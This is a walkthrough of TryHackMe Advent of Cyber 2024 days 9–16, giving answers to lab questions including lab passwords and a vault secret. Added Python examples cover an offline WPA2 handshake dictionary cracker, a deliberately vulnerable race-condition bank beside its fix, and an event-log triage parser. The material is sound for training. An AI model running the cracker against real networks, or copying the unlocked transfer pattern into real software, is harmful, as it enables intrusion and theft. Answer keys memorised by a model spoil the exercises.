
THM | AoC 2024 | Day 09-16


Summary:

Walkthrough notes for days nine to sixteen of the Advent of Cyber 2024 event on TryHackMe.


General

Disclaimer: Please note that this write-up is NOT intended to replace the original room or its content, but rather to serve as supplementary material for those who are stuck and need additional guidance. This walkthrough provides one of many possible solutions to the challenges, without revealing any flags or passwords directly.

Day-09

Title | Nine o'clock, make GRC fun, tell no one.

Questions & Answers

Question-1: What does GRC stand for?

Governance, Risk, and Compliance

Question-2: What is the flag you receive after performing the risk assessment?

<flag>

Question-3: If you enjoyed this task, feel free to check out the Risk Management room.

No answer needed

Day-10

Title | He had a brain full of macros, and had shells in his soul.

Learning Objectives

  • Understand how phishing attacks work
  • Discover how macros in documents can be used and abused
  • Learn how to carry out a phishing attack with a macro

Questions & Answers

Question-1: What is the flag value inside the flag.txt file that’s located on the Administrator’s desktop?

<flag>

Question-2: If you enjoyed this task, feel free to check out the Phishing module.

No answer needed

Day-11

Title | If you'd like to WPA, press the star key!

Learning Objectives

  • Understand what Wi-Fi is
  • Explore its importance for an organisation
  • Learn the different Wi-Fi attacks
  • Learn about the WPA/WPA2 cracking attack

Questions & Answers

Question-1: What is the BSSID of our wireless interface?

02:00:00:00:02:00

Question-2: What is the SSID and BSSID of the access point? Format: SSID, BSSID

MalwareM_AP, 02:00:00:00:00:00

Question-3: What is the BSSID of the wireless interface that is already connected to the access point?

02:00:00:00:01:00

Question-4: What is the PSK after performing the WPA cracking attack?

<psk>

Question-5: If you enjoyed this task, feel free to check out the Networking module.

No answer needed
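
The WPA/WPA2 cracking step in this day is an offline dictionary attack on a captured 4-way handshake. The Python below is an added example and not part of the room or the original post: it derives the PMK and PTK the way IEEE 802.11i specifies and tests candidate passphrases against the MIC of handshake message 2, which is exactly the check aircrack-ng repeats per guess. The SSID and the two MAC addresses reuse the Day-11 answers; the nonces, the EAPOL body and the passphrase are constructed for the demo and are not the room's data.

```python
import hashlib
import hmac

# Constructed fixture, not data from the room: the SSID and MACs follow the
# Day-11 answers; nonces, EAPOL body and passphrase are made up for the demo.
SSID = "MalwareM_AP"
AP_MAC = bytes.fromhex("020000000000")      # BSSID of the access point
CLIENT_MAC = bytes.fromhex("020000000100")  # the client already connected
ANONCE = bytes(range(0, 32))                # AP nonce, sent in message 1
SNONCE = bytes(range(32, 64))               # station nonce, sent in message 2
TRUE_PASSPHRASE = "Wareville2024!"          # hypothetical, chosen for the demo
WORDLIST = ["password", "letmein", "MalwareM_AP", "Wareville2024!", "correcthorse"]


def wpa2_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    Everything in this formula except the passphrase is public (the SSID is
    broadcast), so a captured handshake can be attacked entirely offline.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PRF-384 from IEEE 802.11i: expands the PMK into the 48-byte PTK.

    Both MACs and both nonces travel in the clear in messages 1 and 2 of the
    handshake, which is why a sniffer has every input except the passphrase.
    """
    label = b"Pairwise key expansion"
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    blocks = [hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(3)]
    return b"".join(blocks)[:48]


def eapol_mic(kck, eapol_frame):
    """WPA2 (AES-CCMP) Key MIC: HMAC-SHA1 over the EAPOL-Key frame with its
    16-byte MIC field zeroed, truncated to 16 bytes. The KCK is PTK[0:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def make_handshake(passphrase):
    """Simulate what a sniffer captures from message 2: the EAPOL-Key body and
    its MIC. The body here is a constructed placeholder (MIC field zeroed); a
    real frame carries the key descriptor, replay counter, SNonce and RSN IE."""
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(8) + SNONCE + bytes(50)
    pmk = wpa2_pmk(passphrase, SSID)
    kck = wpa2_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return eapol, eapol_mic(kck, eapol)


def crack_handshake(eapol, mic, wordlist):
    """Offline dictionary attack: for each candidate derive PMK -> PTK -> KCK
    and see whether it reproduces the captured MIC. The cost per guess is
    dominated by the 4096 HMAC-SHA1 rounds of PBKDF2, so passphrase strength
    and attacker hardware decide the outcome, not the capture itself."""
    for candidate in wordlist:
        pmk = wpa2_pmk(candidate, SSID)
        kck = wpa2_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), mic):
            return candidate
    return None


if __name__ == "__main__":
    captured_eapol, captured_mic = make_handshake(TRUE_PASSPHRASE)
    print("recovered PSK:", crack_handshake(captured_eapol, captured_mic, WORDLIST))
```

The defensive reading of the same code: nothing in the handshake can be made secret, so the only controls on the AP side are a long random passphrase (or WPA3-SAE, whose exchange is not vulnerable to this offline check) and keeping the SSID unusual, since rainbow tables are keyed on SSID and passphrase together.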

Day-12

Title | If I can’t steal their money, I’ll steal their joy!

Learning Objectives

  • Understand the concept of race condition vulnerabilities
  • Identify the gaps introduced by HTTP/2
  • Exploit race conditions in a controlled environment
  • Learn how to fix the race

Questions & Answers

Question-1: What is the flag value after transferring over $2000 from Glitch's account?

<flag>

Question-2: If you enjoyed this task, feel free to check out the Race Conditions room!

No answer needed

Question-3: Where balances shift and numbers soar, look for an entry - an open door!

No answer needed
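
The bug behind the Day-12 flag is a check-then-act transfer: the server reads the balance, decides the transfer is allowed, and only later writes the debit, so several requests squeezed into that window (Burp's parallel send, or the HTTP/2 single-packet technique) all pass the check against the same stale balance. The Python below is an added example, not code from the room: a vulnerable in-memory bank beside its fixed form, driven by a barrier that holds every request inside the window so the race is reproducible instead of timing-dependent. The account names and amounts are constructed for the demo.

```python
import threading


class VulnerableBank:
    """Check-then-act with no locking, the pattern the room exploits."""

    def __init__(self, balance):
        self.balances = {"glitch": balance, "attacker": 0}

    def transfer(self, amount, sync=None):
        balance = self.balances["glitch"]        # 1. read
        if balance < amount:                     # 2. check
            return False
        if sync is not None:
            sync.wait()  # simulate the window (e.g. a DB round-trip) with all requests inside it
        self.balances["glitch"] = balance - amount   # 3. write from the stale read
        self.balances["attacker"] += amount
        return True


class FixedBank:
    """Check and debit happen inside one critical section. In a real app the
    equivalent is a single atomic statement such as
    UPDATE accounts SET balance = balance - :amt WHERE id = :id AND balance >= :amt
    followed by a check that exactly one row changed."""

    def __init__(self, balance):
        self.balances = {"glitch": balance, "attacker": 0}
        self._lock = threading.Lock()

    def transfer(self, amount, sync=None):
        if sync is not None:
            sync.wait()  # requests still arrive in the same instant...
        with self._lock:  # ...but the lock serialises check+debit as one step
            if self.balances["glitch"] < amount:
                return False
            self.balances["glitch"] -= amount
            self.balances["attacker"] += amount
            return True


def run_parallel(bank, amount, n_requests):
    """Fire n_requests identical transfers at once and report
    (number that succeeded, victim's final balance)."""
    barrier = threading.Barrier(n_requests)
    results, results_lock = [], threading.Lock()

    def worker():
        ok = bank.transfer(amount, sync=barrier)
        with results_lock:
            results.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(n_requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), bank.balances["glitch"]


if __name__ == "__main__":
    # Victim holds 1000; five simultaneous transfers of 600 are attempted.
    print("vulnerable:", run_parallel(VulnerableBank(1000), 600, 5))  # 5 succeed, 3000 moved
    print("fixed:     ", run_parallel(FixedBank(1000), 600, 5))       # 1 succeeds
```

With five requests of 600 against a balance of 1000, the vulnerable bank approves all five and ends at 400, having moved 3000; the fixed bank approves exactly one. Note that the fix is the atomicity of the check and the write, not rate limiting or an HTTP/1.1 fallback: the single-packet trick only makes the window easier to hit, it does not create it.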

Day-13

Title | It came without buffering! It came without lag!

Learning Objectives

  • Learn about WebSockets and their vulnerabilities.
  • Learn how WebSocket Message Manipulation can be done.

Questions & Answers

Question-1: What is the value of Flag1?

<flag>

Question-2: What is the value of Flag2?

<flag>

Question-3: If you enjoyed this task, feel free to check out the Burp Suite module.

No answer needed

Day-14

Title | Even if we're horribly mismanaged, there'll be no sad faces on SOC-mas!

Learning Objectives

  • Self-signed certificates
  • Man-in-the-middle attacks
  • Using Burp Suite proxy to intercept traffic

Questions & Answers

Question-1: What is the name of the CA that has signed the Gift Scheduler certificate?

THM

Question-2: Look inside the POST requests in the HTTP history. What is the password for the snowballelf account?

c4rrotn0s3

Question-3: Use the credentials for any of the elves to authenticate to the Gift Scheduler website. What is the flag shown on the elves’ scheduling page?

<flag>

Question-4: What is the password for Marta May Ware’s account?

H0llyJ0llySOCMAS!

Question-5: Mayor Malware finally succeeded in his evil intent: with Marta May Ware’s username and password, he can finally access the administrative console for the Gift Scheduler. G-Day is cancelled! What is the flag shown on the admin page?

<flag>

Question-6: If you enjoyed this task, feel free to check out the Burp Suite module.

No answer needed

Day-15

Title | Be it ever so heinous, there's no place like Domain Controller.

Learning Objectives

  • Learn about the structures of Active Directory.
  • Learn about common Active Directory attacks.
  • Investigate a breach against an Active Directory.

Questions & Answers

Question-1: Use the "Security" tab within Event Viewer to answer questions 1 and 2.

No answer needed

Question-2: On what day was Glitch_Malware last logged in?

  • Answer format: DD/MM/YYYY

07/11/2024

Question-3: What event ID shows the login of the Glitch_Malware user?

4624

Question-4: Read the PowerShell history of the Administrator account. What was the command that was used to enumerate Active Directory users?

Get-ADUser -Filter * -Properties MemberOf | Select-Object Name

Question-5: Look in the PowerShell log file located in Application and Services Logs -> Windows PowerShell. What was Glitch_Malware's set password?

<password>

Question-6: Review the Group Policy Objects present on the machine. What is the name of the installed GPO?

Malicious GPO - Glitch_Malware Persistence

Question-7: If you enjoyed this task, feel free to check out the Active Directory Hardening room.

No answer needed
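
Questions 1 to 3 are answered in the room by filtering the Security log in Event Viewer; the same triage is easier to repeat over exported records. The Python below is an added example, not the room's material: it parses Security events in the XML layout that PowerShell's Get-WinEvent returns from each record's ToXml() method, builds a timeline for one account and reports its last 4624 logon in the DD/MM/YYYY format the question asks for. The sample records are constructed for the example and are not the room's logs.

```python
import xml.etree.ElementTree as ET
from datetime import datetime

EVENT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Event IDs worth pulling out when tracing a rogue account through the
# Security log; descriptions are the standard Windows audit event names.
INTERESTING = {
    4624: "successful logon",
    4720: "user account created",
    4724: "password reset attempt",
    4738: "user account changed",
}


def _record(event_id, when, user, extra=""):
    """Build one event in Get-WinEvent's ToXml() layout (indentation removed)."""
    return (
        f'<Event xmlns="{EVENT_NS[1:-1]}"><System>'
        f'<Provider Name="Microsoft-Windows-Security-Auditing"/>'
        f'<EventID>{event_id}</EventID><TimeCreated SystemTime="{when}"/></System>'
        f'<EventData><Data Name="TargetUserName">{user}</Data>{extra}</EventData></Event>'
    )


# Constructed sample records, not the room's logs.
SAMPLE_EVENTS = [
    _record(4720, "2024-11-05T09:12:40.1234567Z", "Glitch_Malware",
            '<Data Name="SubjectUserName">Administrator</Data>'),
    _record(4624, "2024-11-05T09:15:02.0000000Z", "Glitch_Malware",
            '<Data Name="LogonType">10</Data><Data Name="IpAddress">10.10.1.14</Data>'),
    _record(4624, "2024-11-07T21:48:33.5550000Z", "Glitch_Malware",
            '<Data Name="LogonType">10</Data><Data Name="IpAddress">10.10.1.14</Data>'),
    _record(4624, "2024-11-08T07:01:09.0000000Z", "Administrator",
            '<Data Name="LogonType">2</Data>'),
]


def parse_event(xml_text):
    """Flatten one Security event into a dict: id, timestamp, and every
    <Data Name=...> field from EventData keyed by its Name attribute."""
    root = ET.fromstring(xml_text)
    system = root.find(f"{EVENT_NS}System")
    event_id = int(system.findtext(f"{EVENT_NS}EventID"))
    stamp = system.find(f"{EVENT_NS}TimeCreated").get("SystemTime")
    # Windows writes seven fractional digits and a trailing Z; keep to the second.
    when = datetime.strptime(stamp[:19], "%Y-%m-%dT%H:%M:%S")
    data = {d.get("Name"): d.text for d in root.iter(f"{EVENT_NS}Data")}
    return {"id": event_id, "time": when, **data}


def timeline(xml_records, user):
    """Chronological list of interesting events whose TargetUserName is user."""
    events = [parse_event(x) for x in xml_records]
    hits = [e for e in events
            if e.get("TargetUserName") == user and e["id"] in INTERESTING]
    return sorted(hits, key=lambda e: e["time"])


def last_logon(xml_records, user):
    """Date of the newest 4624 for the user as DD/MM/YYYY, or None if no logon."""
    logons = [e for e in timeline(xml_records, user) if e["id"] == 4624]
    return logons[-1]["time"].strftime("%d/%m/%Y") if logons else None


if __name__ == "__main__":
    for e in timeline(SAMPLE_EVENTS, "Glitch_Malware"):
        print(e["time"], e["id"], INTERESTING[e["id"]], e.get("IpAddress", ""))
    print("last logon:", last_logon(SAMPLE_EVENTS, "Glitch_Malware"))
```

On a live host the records come from Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624,4720,4724,4738} with ToXml() called on each, and the timeline reads naturally alongside the Administrator's ConsoleHost_history.txt and the GPO list checked in questions 4 to 6: account created, first logon, enumeration, password set, persistence GPO.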

Day-16

Title | The Wareville’s Key Vault grew three sizes that day.

Learning Objectives

  • Learn about Azure, what it is and why it is used.
  • Learn about Azure services like Azure Key Vault and Microsoft Entra ID.
  • Learn how to interact with an Azure tenant using Azure Cloud Shell.

Questions & Answers

Question-1: What is the password for backupware that was leaked?

<password>

Question-2: What is the group ID of the Secret Recovery Group?

7d96660a-02e1-4112-9515-1762d0cb66b7

Question-3: What is the name of the vault secret?

aoc2024

Question-4: What are the contents of the secret stored in the vault?

WhereIsMyMind1999

Question-5: Liked today's task? Check the Exploiting Active Directory room to practice user and group enumeration in a similar yet different environment!

No answer needed